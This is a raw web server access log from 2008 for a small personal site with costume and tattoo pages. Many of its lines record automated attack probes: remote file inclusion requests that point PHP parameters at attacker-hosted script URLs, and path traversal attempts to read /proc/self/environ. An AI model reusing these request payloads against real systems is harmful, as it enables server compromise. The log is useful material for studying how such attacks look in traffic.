94.23.0.147 - - [02/Nov/2008:19:08:39 -0600] "GET /logs/encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 317 "-""XXXXXX"
94.23.0.147 - - [02/Nov/2008:19:08:39 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [02/Nov/2008:19:08:39 -0600] "GET /logs/encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""XXXXXX"
94.23.0.147 - - [02/Nov/2008:19:08:39 -0600] "GET /encapscms_PATH/core/core.php?root=http://clusty.com/search??? HTTP/1.1" 404 312 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [02/Nov/2008:19:08:39 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [02/Nov/2008:19:08:39 -0600] "GET /encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 312 "-""XXXXXX"
94.23.0.147 - - [02/Nov/2008:19:08:40 -0600] "GET /encapscms_PATH/core/core.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""XXXXXX"
210.86.238.70 - - [02/Nov/2008:19:09:00 -0600] "GET /logs/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
210.86.238.70 - - [02/Nov/2008:19:09:00 -0600] "GET /lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
74.53.124.98 - - [02/Nov/2008:19:15:08 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
213.247.43.5 - - [02/Nov/2008:19:15:40 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
213.247.43.5 - - [02/Nov/2008:19:15:41 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
74.53.124.98 - - [02/Nov/2008:19:16:55 -0600] "GET /logs/access_log.1208304000//newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
74.53.124.98 - - [02/Nov/2008:19:16:55 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
74.53.124.98 - - [02/Nov/2008:19:16:55 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.shefaa.org/images/id?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:19:17:40 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:19:17:40 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
67.150.159.206 - - [02/Nov/2008:19:20:26 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
67.150.159.206 - - [02/Nov/2008:19:20:26 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
213.165.84.215 - - [02/Nov/2008:19:20:30 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
213.165.84.215 - - [02/Nov/2008:19:20:31 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
193.95.93.158 - - [02/Nov/2008:19:24:29 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
193.95.93.158 - - [02/Nov/2008:19:24:29 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
193.95.93.158 - - [02/Nov/2008:19:24:29 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
193.95.93.158 - - [02/Nov/2008:19:24:29 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
70.85.114.130 - - [02/Nov/2008:19:25:41 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
70.85.114.130 - - [02/Nov/2008:19:25:41 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
70.85.114.130 - - [02/Nov/2008:19:25:42 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
70.85.114.130 - - [02/Nov/2008:19:25:42 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
68.4.221.124 - - [02/Nov/2008:19:26:06 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.usarmygermany.com/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:06 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:06 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:07 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:07 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:10 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:41 -0600] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/thmb4.htm HTTP/1.1" 200 3298 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/costm37.jpg HTTP/1.1" 200 9819 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/costm39.jpg HTTP/1.1" 200 9800 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/costm38.jpg HTTP/1.1" 200 9710 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/costm41.jpg HTTP/1.1" 200 9976 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/costm42.jpg HTTP/1.1" 200 9593 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/costm43.jpg HTTP/1.1" 200 9745 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/costm44.jpg HTTP/1.1" 200 9808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:50 -0600] "GET /costume/costm46.jpg HTTP/1.1" 200 9599 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:51 -0600] "GET /costume/costm45.jpg HTTP/1.1" 200 9735 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:51 -0600] "GET /costume/costm47.jpg HTTP/1.1" 200 9945 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:51 -0600] "GET /costume/costm48.jpg HTTP/1.1" 200 10085 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
68.4.221.124 - - [02/Nov/2008:19:26:51 -0600] "GET /costume/costm40.jpg HTTP/1.1" 200 60324 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
216.139.67.116 - - [02/Nov/2008:19:28:12 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.64"
216.139.67.116 - - [02/Nov/2008:19:28:12 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.64"
89.218.85.18 - - [02/Nov/2008:19:30:16 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.218.85.18 - - [02/Nov/2008:19:30:16 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
202.53.141.2 - - [02/Nov/2008:19:31:28 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
202.53.141.2 - - [02/Nov/2008:19:31:28 -0600] "GET /logs/access_log.1206144000%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
202.53.141.2 - - [02/Nov/2008:19:31:28 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
213.21.215.187 - - [02/Nov/2008:19:32:12 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
213.21.215.187 - - [02/Nov/2008:19:32:12 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
216.32.94.162 - - [02/Nov/2008:19:32:23 -0600] "GET /logs/access_log.1206144000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 378 "-""libwww-perl/5.810"
216.32.94.162 - - [02/Nov/2008:19:32:24 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
216.32.94.162 - - [02/Nov/2008:19:32:24 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
71.222.219.189 - - [02/Nov/2008:19:32:44 -0600] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.140.135.93 - - [02/Nov/2008:19:33:02 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
200.140.135.93 - - [02/Nov/2008:19:33:02 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
200.140.135.93 - - [02/Nov/2008:19:33:02 -0600] "GET /logs/access_log.1206144000%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 379 "-""libwww-perl/5.65"
66.172.9.3 - - [02/Nov/2008:19:33:07 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.172.9.3 - - [02/Nov/2008:19:33:07 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
71.222.219.189 - - [02/Nov/2008:19:33:12 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.222.219.189 - - [02/Nov/2008:19:33:13 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.222.219.189 - - [02/Nov/2008:19:33:14 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.222.219.189 - - [02/Nov/2008:19:33:15 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
71.222.219.189 - - [02/Nov/2008:19:33:16 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.38.4.3 - - [02/Nov/2008:19:36:13 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
64.38.4.3 - - [02/Nov/2008:19:36:13 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
200.140.135.93 - - [02/Nov/2008:19:37:59 -0600] "GET /logs/access_log.1206144000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 378 "-""libwww-perl/5.65"
212.227.60.81 - - [02/Nov/2008:19:43:00 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [02/Nov/2008:19:43:00 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 362 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [02/Nov/2008:19:43:01 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 362 "-""XXXXXX"
212.227.60.81 - - [02/Nov/2008:19:43:01 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 362 "-""XXXXXX"
212.227.60.81 - - [02/Nov/2008:19:43:02 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 404 357 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [02/Nov/2008:19:43:02 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [02/Nov/2008:19:43:02 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 357 "-""XXXXXX"
212.227.60.81 - - [02/Nov/2008:19:43:02 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""XXXXXX"
211.234.110.184 - - [02/Nov/2008:19:43:20 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
211.234.110.184 - - [02/Nov/2008:19:43:20 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
200.140.135.93 - - [02/Nov/2008:19:44:04 -0600] "GET /logs/access_log.1215302400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 378 "-""libwww-perl/5.65"
216.32.94.162 - - [02/Nov/2008:19:45:42 -0600] "GET /logs/access_log.1215302400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 378 "-""libwww-perl/5.810"
192.251.111.2 - - [02/Nov/2008:19:46:29 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://search.msn.com/results.aspx?srch=105&FORM=AS5&q=vintage+tattoos""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
192.251.111.2 - - [02/Nov/2008:19:46:29 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
192.251.111.2 - - [02/Nov/2008:19:46:29 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
192.251.111.2 - - [02/Nov/2008:19:46:36 -0600] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
202.53.141.2 - - [02/Nov/2008:19:46:40 -0600] "GET /logs/access_log.1206144000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
193.53.23.32 - - [02/Nov/2008:19:47:19 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
193.53.23.32 - - [02/Nov/2008:19:47:19 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
216.32.94.162 - - [02/Nov/2008:19:48:01 -0600] "GET /logs/access_log.1206144000%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 379 "-""libwww-perl/5.810"
210.86.238.70 - - [02/Nov/2008:19:48:18 -0600] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
210.86.238.70 - - [02/Nov/2008:19:48:19 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
210.86.238.70 - - [02/Nov/2008:19:48:20 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
213.165.84.215 - - [02/Nov/2008:19:50:59 -0600] "GET /logs/?DOCUMENT_ROOT=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 200 105501 "-""libwww-perl/5.805"
213.165.84.215 - - [02/Nov/2008:19:50:59 -0600] "GET /?DOCUMENT_ROOT=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
216.65.1.253 - - [02/Nov/2008:19:52:11 -0600] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
216.65.1.253 - - [02/Nov/2008:19:52:11 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
67.195.98.220 - - [02/Nov/2008:19:53:37 -0600] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.65.1.253 - - [02/Nov/2008:19:56:45 -0600] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
72.30.79.125 - - [02/Nov/2008:19:58:30 -0600] "GET /logs/access_log.1191628800 HTTP/1.0" 200 155236 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.192.241.74 - - [02/Nov/2008:20:00:03 -0600] "GET /?DOCUMENT_ROOT=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 200 1243 "-""libwww-perl/5.64"
91.192.241.74 - - [02/Nov/2008:20:00:03 -0600] "GET /logs/?DOCUMENT_ROOT=http://www.pamyat.ru/forums/modules/punish/rsguz.gif?? HTTP/1.1" 200 36689 "-""libwww-perl/5.64"
65.55.208.130 - - [02/Nov/2008:20:00:10 -0600] "GET /artwork/ HTTP/1.1" 200 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.43.85.169 - - [02/Nov/2008:20:00:17 -0600] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.169 - - [02/Nov/2008:20:00:28 -0600] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://s.webring.com/hub?ring=history;id=1163;prvw""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.169 - - [02/Nov/2008:20:00:45 -0600] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.169 - - [02/Nov/2008:20:01:03 -0600] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
208.43.85.169 - - [02/Nov/2008:20:01:13 -0600] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)"
211.51.221.135 - - [02/Nov/2008:20:01:21 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
211.51.221.135 - - [02/Nov/2008:20:01:22 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
64.12.117.143 - - [02/Nov/2008:20:03:17 -0600] "HEAD /costume/ HTTP/1.1" 200 0 "-""Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; FunWebProducts; SV1)"
210.219.173.249 - - [02/Nov/2008:20:09:25 -0600] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
